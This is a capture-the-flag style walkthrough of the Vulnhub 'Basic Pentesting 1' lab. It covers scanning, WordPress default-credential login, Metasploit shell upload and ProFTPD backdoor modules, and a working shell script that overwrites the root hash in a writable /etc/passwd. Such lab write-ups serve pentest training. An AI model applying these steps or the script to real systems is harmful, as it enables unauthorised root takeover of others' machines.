This is a walkthrough of the Basic Pentesting 1 machine from Vulnhub, used to introduce the basic steps and methodology of a penetration test: scanning, enumeration, exploitation and privilege escalation.
Getting a Lay of the Land
The process kicks off with some initial detective work. We use the common tool nmap to scan the target machine, which is like checking all the doors and windows on a building to see which ones are unlocked. The scan quickly reveals three open services: an FTP server for file transfers, an SSH port for remote logins, and a web server.
Initial Scanning and Enumeration
The first step is scanning the machine with Nmap to discover open ports and the services behind them, including their version banners. The scan reveals three open ports: FTP (21), SSH (22) and HTTP (80). We then add an entry to the hosts file (/etc/hosts) mapping the machine's IP address to the name vtac, and use Nikto to scan the web server for vulnerabilities and interesting directories.
Open Ports
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2
80/tcp open http Apache httpd 2.4.18 (Ubuntu)
We use the searchsploit command to look up ProFTPD 1.3.3c in Exploit-DB.
It returns two entries, both for the same issue: a backdoor in ProFTPD 1.3.3c. A backdoor is malicious code hidden inside otherwise legitimate software; in this case the project's distribution server was compromised in late 2010 and the 1.3.3c source tarball was replaced with one containing code that executes commands for anyone who sends a specific trigger to the FTP service. The Metasploit framework has a module for this backdoor command execution (exploit/unix/ftp/proftpd_133c_backdoor).
Discovering a WordPress Installation
Nikto reveals a WordPress installation in the /secret directory. We use WPScan to enumerate the WordPress site, including its users. WPScan identifies the WordPress username as admin, and we try the default credentials admin/admin, which successfully grant access to the WordPress dashboard.
Exploitation Using Metasploit
After confirming the login, we use Metasploit to exploit the WordPress installation. The WP Admin Shell Upload module (exploit/unix/webapp/wp_admin_shell_upload) uses the admin credentials to upload a malicious plugin containing a PHP payload and requests it, giving us a Meterpreter session on the target machine. The session runs as the www-data user, the account the web server runs under, so at this point we only have the privileges of the web server.
Gaining Initial Access
Now with valid login credentials, it's time to take control. We turn to the Metasploit framework, a toolkit packed with pre-made exploits. We select the exploit designed for WordPress, feed it the machine's address, the path to the WordPress installation and the admin:admin login details, and run it. The exploit works, uploading a small program that gives us a basic shell, which is essentially a command line on the target machine.
Privilege Escalation
To escalate privileges, we run unix-privesc-check (the Unix privilege escalation checker script), which looks for common privilege escalation vectors on the system. The tool reports that the /etc/passwd file is writable by our user. That is enough to become root: the second field of each passwd entry normally holds an x, meaning the real password hash lives in /etc/shadow, but if a hash is placed in that field directly it is used for authentication and /etc/shadow is never consulted. We generate a password hash with openssl passwd, replace the x in the root entry with it, and can then log in as root with the password we chose.
Becoming Root
Having a basic shell is good, but the ultimate goal is root access, the highest level of control. To find a way to elevate our privileges, we run a script that checks for common security misconfigurations.
The script hits the jackpot: it discovers that a critical system file, /etc/passwd (which stores user account information), is writable. This is a major security flaw, since that file decides who can log in and as whom. We download the file, create a new password hash for the root user, and put that hash in the root entry in place of the x placeholder that points to /etc/shadow. We then upload the modified file back to the machine. With the new password in place, we simply switch to the root user with su and the password we chose, and just like that, we have complete control.
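To make the passwd edit concrete, here is an added example script (not from the walkthrough or the video) that performs the same change on a local copy of a passwd file, so it can be dry-run safely before being used on the target. It also includes the check a defender would run afterwards: listing accounts whose password field holds a hash instead of the x placeholder. The function names, the sample passwd lines and the placeholder password are this example's own assumptions.

```shell
#!/bin/sh
# Added example: abusing a writable /etc/passwd to become root, written
# to run against any passwd-format file so it can be tested on a copy.
# Not code from the original walkthrough.

# Generate a password hash suitable for the passwd file. -6 selects
# SHA-512 crypt; -1 (MD5 crypt) is also accepted but weaker. Needs openssl.
make_hash() {
    openssl passwd -6 "$1"
}

# The condition unix-privesc-check reports: is the file writable by us?
passwd_is_writable() {
    [ -w "$1" ]
}

# Replace the password field of the root entry. Normally that field is "x",
# which tells login/su to look the hash up in /etc/shadow; a hash placed
# here is used directly and /etc/shadow is never consulted.
set_root_hash() {
    file="$1"
    hash="$2"
    tmp=$(mktemp)
    awk -F: -v OFS=: -v h="$hash" '$1 == "root" { $2 = h } { print }' "$file" > "$tmp"
    # Write back with cat rather than mv: mv needs write access to the
    # directory (/etc) as well, and would replace the inode and its mode.
    cat "$tmp" > "$file"
    rm -f "$tmp"
}

# Password field of the root entry, for verification before trying su.
root_field() {
    awk -F: '$1 == "root" { print $2 }' "$1"
}

# Defender's view: accounts whose password field is neither the "x"
# placeholder, a lock marker nor empty, i.e. a hash stored in passwd itself,
# which is exactly what this attack leaves behind.
passwd_entries_with_hash() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "!" && $2 != "" { print $1 }' "$1"
}

# Usage on the target, from the www-data shell (placeholder password):
#   passwd_is_writable /etc/passwd && set_root_hash /etc/passwd "$(make_hash 'NewRootPass')"
#   su root      # enter NewRootPass
```

Editing in place with awk and cat avoids the download/upload round trip described above, and works even when /etc itself is not writable. After use, the extra line that passwd_entries_with_hash reports is a clear indicator for defenders; so is /etc/passwd being writable in the first place, which is what unix-privesc-check flagged.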
An Alternative Route: The Second Method
We also briefly explore another potential path to root access. The initial scan had shown a potentially vulnerable version of the FTP service, ProFTPD 1.3.3c, whose backdoor has a ready-made Metasploit module. We try the exploit but run into technical trouble, with the target machine becoming unresponsive. This alternative route could also have led to a shell: because the backdoor executes commands with the privileges of the ProFTPD process, which is typically root, it would likely have skipped the separate privilege escalation step entirely.
In essence, the video provides a clear and practical walkthrough of a penetration test, from the initial scan to a full system takeover, highlighting how a series of small vulnerabilities can be chained together to achieve a significant breach.